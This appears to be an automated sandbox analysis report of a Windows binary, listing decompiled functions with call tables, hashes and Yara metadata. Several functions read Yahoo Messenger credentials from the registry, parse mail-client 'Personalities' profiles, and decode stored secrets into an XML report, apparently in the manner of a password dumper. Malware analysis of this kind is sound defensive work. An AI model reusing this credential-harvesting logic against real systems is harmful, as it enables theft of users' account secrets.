                                                                                  • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                • strlen.MSVCRT ref: 004113D0
                                                                                • memcpy.MSVCRT ref: 004113F5
                                                                                • memcpy.MSVCRT ref: 0041140B
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                  • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                • memcpy.MSVCRT ref: 0041144B
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpymemset$strlen
                                                                                • String ID:
                                                                                • API String ID: 2142929671-0
                                                                                • Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                • Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
                                                                                • Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                • Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004078FF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 36%
                                                                                			E004078FF(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t23;
				void* _t31;
				signed short _t39;
				signed int _t40;
				void* _t51;
				int _t56;
				void* _t57;
				int _t67;

				_t39 = __ebx;
				if( *0x417540 == 0) {
					E0040787D();
				}
				_t40 =  *0x417538;
				_t17 = 0;
				if(_t40 <= 0) {
					L5:
					_t51 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
						_t17 = _t17 + 1;
						if(_t17 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
				}
				L6:
				if(_t51 != 0) {
					L22:
					_t18 = _t51;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x4171b8 == 0) {
							_push( *0x417548 - 1);
							_push( *0x41752c);
							_push(_t39);
							_push(E00407A55());
							goto L16;
						} else {
							strcpy(0x4172c0, "strings");
							_t31 = E00407D89(_t39,  *0x41752c);
							_t57 = _t57 + 0x10;
							if(_t31 == 0) {
								L14:
								_push( *0x417548 - 1);
								_push( *0x41752c);
								_push(_t39);
								goto L9;
							} else {
								_t56 = strlen( *0x41752c);
								if(_t56 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_push( *0x417548 - 1);
						_push( *0x41752c);
						_push(_t39 & 0x0000ffff);
						L9:
						_push( *0x416b94);
						L16:
						_t56 = LoadStringA();
						_t67 = _t56;
					}
					if(_t67 <= 0) {
						L21:
						_t18 = 0x412466;
					} else {
						_t23 =  *0x41753c;
						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
							goto L21;
						} else {
							_t51 = _t23 +  *0x417528;
							_t10 = _t56 + 1; // 0x1
							memcpy(_t51,  *0x41752c, _t10);
							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
							 *( *0x417530 +  *0x417538 * 4) = _t39;
							 *0x417538 =  *0x417538 + 1;
							 *0x41753c =  *0x41753c + _t56 + 1;
							if(_t51 != 0) {
								goto L22;
							} else {
								goto L21;
							}
						}
					}
				}
				return _t18;
			}













                                                                                0x004078ff
                                                                                0x00407906
                                                                                0x00407908
                                                                                0x00407908
                                                                                0x0040790d
                                                                                0x00407914
                                                                                0x00407919
                                                                                0x0040792b
                                                                                0x0040792b
                                                                                0x0040791b
                                                                                0x0040791b
                                                                                0x00407926
                                                                                0x00407929
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407929
                                                                                0x0040795f
                                                                                0x0040795f
                                                                                0x0040792d
                                                                                0x0040792f
                                                                                0x00407a50
                                                                                0x00407a50
                                                                                0x00407935
                                                                                0x0040793b
                                                                                0x0040796e
                                                                                0x004079ba
                                                                                0x004079bb
                                                                                0x004079c1
                                                                                0x004079c7
                                                                                0x00000000
                                                                                0x00407970
                                                                                0x0040797a
                                                                                0x00407986
                                                                                0x0040798b
                                                                                0x00407990
                                                                                0x004079a4
                                                                                0x004079aa
                                                                                0x004079ab
                                                                                0x004079b1
                                                                                0x00000000
                                                                                0x00407992
                                                                                0x0040799d
                                                                                0x004079a2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004079a2
                                                                                0x00407990
                                                                                0x0040793d
                                                                                0x00407943
                                                                                0x00407944
                                                                                0x0040794d
                                                                                0x0040794e
                                                                                0x0040794e
                                                                                0x004079c8
                                                                                0x004079ce
                                                                                0x004079d0
                                                                                0x004079d0
                                                                                0x004079d2
                                                                                0x00407a49
                                                                                0x00407a49
                                                                                0x004079d4
                                                                                0x004079d4
                                                                                0x004079e3
                                                                                0x00000000
                                                                                0x004079f3
                                                                                0x004079f9
                                                                                0x004079fc
                                                                                0x00407a07
                                                                                0x00407a1d
                                                                                0x00407a2b
                                                                                0x00407a36
                                                                                0x00407a42
                                                                                0x00407a47
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407a47
                                                                                0x004079e3
                                                                                0x004079d2
                                                                                0x00407a54

                                                                                APIs
                                                                                • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                                  • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                                                • strlen.MSVCRT ref: 00407998
                                                                                • LoadStringA.USER32 ref: 004079C8
                                                                                • memcpy.MSVCRT ref: 00407A07
                                                                                  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                                                  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                                                  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                                                  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                                • String ID: strings
                                                                                • API String ID: 1748916193-3030018805
                                                                                • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                                                • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040329E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040329E(void* __fp0, intOrPtr _a4) {
				int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				void _v1035;
				char _v1036;
				char _v1968;
				char _v2900;
				void* __esi;
				void* _t23;
				int _t30;
				char* _t31;
				CHAR* _t49;
				void* _t50;
				void* _t55;

				_t62 = __fp0;
				_t49 = _a4 + 0xd2a;
				if( *_t49 != 0) {
					_t52 =  &_v1968;
					E004021D8( &_v1968);
					if(E0040314D(_t52, _t49, 0) != 0) {
						E00402407(_t52, __fp0, _a4);
					}
					_v1036 = 0;
					memset( &_v1035, 0, 0x400);
					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
					if(_t30 <= 0) {
						L11:
						return _t30;
					} else {
						_v12 = 0;
						_v13 = 0;
						_v14 = 0;
						_v15 = 0;
						_t50 = 0;
						_t31 =  &_v1036;
						while(1) {
							_t30 = strlen(_t31);
							_v8 = _t30;
							if(_t30 <= 0) {
								goto L11;
							}
							_t54 =  &_v2900;
							E004021D8( &_v2900);
							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
								E00402407(_t54, _t62, _a4);
							}
							_t30 = _v8;
							_t50 = _t50 + _t30 + 1;
							if(_t50 >= 0x3ff) {
								goto L11;
							} else {
								_t31 = _t55 + _t50 - 0x408;
								continue;
							}
						}
						goto L11;
					}
				}
				return _t23;
			}



















                                                                                0x0040329e
                                                                                0x004032ac
                                                                                0x004032b6
                                                                                0x004032bd
                                                                                0x004032c3
                                                                                0x004032d3
                                                                                0x004032da
                                                                                0x004032da
                                                                                0x004032ec
                                                                                0x004032f2
                                                                                0x0040330c
                                                                                0x00403314
                                                                                0x00403390
                                                                                0x00000000
                                                                                0x00403316
                                                                                0x00403316
                                                                                0x00403319
                                                                                0x0040331c
                                                                                0x0040331f
                                                                                0x00403322
                                                                                0x00403324
                                                                                0x00403382
                                                                                0x00403383
                                                                                0x0040338a
                                                                                0x0040338e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040332c
                                                                                0x00403332
                                                                                0x0040334a
                                                                                0x00403367
                                                                                0x00403367
                                                                                0x0040336c
                                                                                0x0040336f
                                                                                0x00403379
                                                                                0x00000000
                                                                                0x0040337b
                                                                                0x0040337b
                                                                                0x00000000
                                                                                0x0040337b
                                                                                0x00403379
                                                                                0x00000000
                                                                                0x00403382
                                                                                0x00403314
                                                                                0x00403394

                                                                                APIs
                                                                                  • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                                                • memset.MSVCRT ref: 004032F2
                                                                                • GetPrivateProfileSectionA.KERNEL32 ref: 0040330C
                                                                                • strchr.MSVCRT ref: 00403341
                                                                                  • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                                                • strlen.MSVCRT ref: 00403383
                                                                                  • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                • String ID: Personalities
                                                                                • API String ID: 2103853322-4287407858
                                                                                • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                                                • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410F79, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00410F79(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void _v1031;
				char _v1032;
				void* __esi;
				void* _t25;
				int _t26;

				_t25 = __ecx;
				_t26 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				if(E0040EB3F(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
					if(E0040EB80(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040EB80(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
						_t26 = E004112A1(_t25, _a8, _a4,  &_v1032);
					}
					RegCloseKey(_v8);
				}
				return _t26;
			}









                                                                                0x00410f79
                                                                                0x00410f8a
                                                                                0x00410f94
                                                                                0x00410f9b
                                                                                0x00410fb8
                                                                                0x00410fd1
                                                                                0x00411002
                                                                                0x00411002
                                                                                0x00411007
                                                                                0x00411007
                                                                                0x00411012

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00410F9B
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValuememset
                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                • API String ID: 1830152886-1703613266
                                                                                • Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                • Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
                                                                                • Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                • Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405F41, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405F41(long __eax, struct HWND__* _a4) {
				char _v1028;
				char _v2052;
				void* __edi;
				long _t15;

				_t15 = __eax;
				if(__eax == 0) {
					_t15 = GetLastError();
				}
				E00405E46(_t15,  &_v1028);
				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
			}







                                                                                0x00405f4b
                                                                                0x00405f4f
                                                                                0x00405f57
                                                                                0x00405f57
                                                                                0x00405f60
                                                                                0x00405f79
                                                                                0x00405f9a

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastMessagesprintf
                                                                                • String ID: Error$Error %d: %s
                                                                                • API String ID: 1670431679-1552265934
                                                                                • Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                • Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
                                                                                • Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                • Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F037, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E0040F037(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryA("shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}






                                                                                0x0040f03e
                                                                                0x0040f046
                                                                                0x0040f04e
                                                                                0x0040f056
                                                                                0x0040f063
                                                                                0x0040f063
                                                                                0x0040f066
                                                                                0x0040f070

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,745D48C0,00405C41,00000000), ref: 0040F040
                                                                                • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                • API String ID: 145871493-1506664499
                                                                                • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                                                • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407406, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 104stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
				signed int _v8;
				int _v12;
				char* _v16;
				char _v20;
				signed int* _v24;
				char _v28;
				void _v284;
				char _v540;
				char _v1068;
				void _v3115;
				char _v3116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t36;
				signed int _t40;
				signed int* _t61;
				char _t69;
				char* _t74;
				char* _t75;
				intOrPtr* _t76;
				signed int _t78;
				int _t80;
				void* _t83;
				void* _t84;
				signed int _t89;

				_t74 = __eax;
				_t35 = strlen(__eax);
				_t78 = _t35;
				_t36 = _t35 & 0x80000001;
				if(_t36 < 0) {
					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
					_t89 = _t36;
				}
				if(_t89 != 0 || _t78 <= 0x20) {
					return _t36;
				} else {
					_v3116 = 0;
					memset( &_v3115, 0, 0x7ff);
					_v8 = _v8 & 0x00000000;
					_t61 = _a4 + 4;
					_t40 =  *_t61 | 0x00000001;
					if(_t78 <= 4) {
						L7:
						_t79 =  &_v1068;
						E004046D7( &_v1068);
						if(E004047A0( &_v1068, _t93) != 0) {
							_v20 = _v8;
							_v16 =  &_v3116;
							_v28 = 0x10;
							_v24 = _t61;
							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
								_t80 = _v12;
								if(_t80 > 0xff) {
									_t80 = 0xff;
								}
								_v540 = 0;
								_v284 = 0;
								memcpy( &_v284, _v8, _t80);
								_t27 =  &_a8; // 0x407626
								_t75 =  &_v540;
								 *((char*)(_t84 + _t80 - 0x118)) = 0;
								E004060D0(0xff, _t75,  *_t27);
								 *((intOrPtr*)( *_a4))(_t75);
								LocalFree(_v8);
							}
						}
						return E004047F1( &_v1068);
					}
					_t76 = _t74 + 5;
					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
					do {
						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
						_t40 = _t40 * 0x10ff5;
						_t76 = _t76 + 2;
						_v8 = _v8 + 1;
						_t83 = _t83 - 1;
						_t93 = _t83;
						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
					} while (_t83 != 0);
					goto L7;
				}
			}






























                                                                                0x00407412
                                                                                0x00407415
                                                                                0x0040741a
                                                                                0x0040741c
                                                                                0x00407422
                                                                                0x00407428
                                                                                0x00407428
                                                                                0x00407428
                                                                                0x00407429
                                                                                0x0040754a
                                                                                0x00407438
                                                                                0x00407446
                                                                                0x0040744d
                                                                                0x00407455
                                                                                0x00407459
                                                                                0x00407461
                                                                                0x00407467
                                                                                0x0040749b
                                                                                0x0040749b
                                                                                0x004074a1
                                                                                0x004074ad
                                                                                0x004074b6
                                                                                0x004074bf
                                                                                0x004074d0
                                                                                0x004074d7
                                                                                0x004074e1
                                                                                0x004074e3
                                                                                0x004074ed
                                                                                0x004074ef
                                                                                0x004074ef
                                                                                0x004074fc
                                                                                0x00407503
                                                                                0x0040750a
                                                                                0x0040750f
                                                                                0x00407512
                                                                                0x00407518
                                                                                0x00407520
                                                                                0x00407530
                                                                                0x00407535
                                                                                0x00407535
                                                                                0x004074e1
                                                                                0x00000000
                                                                                0x00407541
                                                                                0x0040746e
                                                                                0x00407471
                                                                                0x00407472
                                                                                0x00407484
                                                                                0x00407486
                                                                                0x0040748d
                                                                                0x0040748e
                                                                                0x00407491
                                                                                0x00407491
                                                                                0x00407492
                                                                                0x00407492
                                                                                0x00000000
                                                                                0x00407472

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                • String ID: &v@
                                                                                • API String ID: 3110682361-3426253984
                                                                                • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                                                • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                • Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409695, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				signed int _t34;
				char* _t45;
				void* _t47;

				E00405EFD(_a4, "<item>\r\n");
				_t34 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
						_t45 =  &_v260;
						E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
						E00405EFD(_a4,  *(__edi + 0x54));
						_t47 = _t47 + 0x28;
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E00405EFD(_a4, "</item>\r\n");
			}








                                                                                0x004096a7
                                                                                0x004096ac
                                                                                0x004096b3
                                                                                0x004096b6
                                                                                0x004096c4
                                                                                0x004096cb
                                                                                0x004096e7
                                                                                0x004096f6
                                                                                0x004096fc
                                                                                0x00409710
                                                                                0x0040971b
                                                                                0x00409720
                                                                                0x00409723
                                                                                0x00409724
                                                                                0x00409729
                                                                                0x0040973b

                                                                                APIs
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                • memset.MSVCRT ref: 004096CB
                                                                                  • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                                                  • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                  • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                • sprintf.MSVCRT ref: 00409710
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                • API String ID: 3200591283-2769808009
                                                                                • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                                                • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407BF9, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00407BF9(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00406560(_t30);
				}
				return 1;
			}









                                                                                0x00407c04
                                                                                0x00407c07
                                                                                0x00407c11
                                                                                0x00407c18
                                                                                0x00407c23
                                                                                0x00407c33
                                                                                0x00407c41
                                                                                0x00407c49
                                                                                0x00407c4f
                                                                                0x00407c55
                                                                                0x00407c5a
                                                                                0x00407c5d
                                                                                0x00407c62
                                                                                0x00407c68

                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 00407C0B
                                                                                • GetWindowRect.USER32 ref: 00407C18
                                                                                • GetClientRect.USER32 ref: 00407C23
                                                                                • MapWindowPoints.USER32 ref: 00407C33
                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                • String ID:
                                                                                • API String ID: 4247780290-0
                                                                                • Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                • Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
                                                                                • Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                • Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A4C8, Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040A4C8(void* __eax) {
				void* __esi;
				void* _t16;
				void* _t33;
				void* _t38;
				void* _t41;

				_t41 = __eax;
				_t16 = E00401033();
				if(_t16 == 0x5cb8) {
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
					E00405E2C();
					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
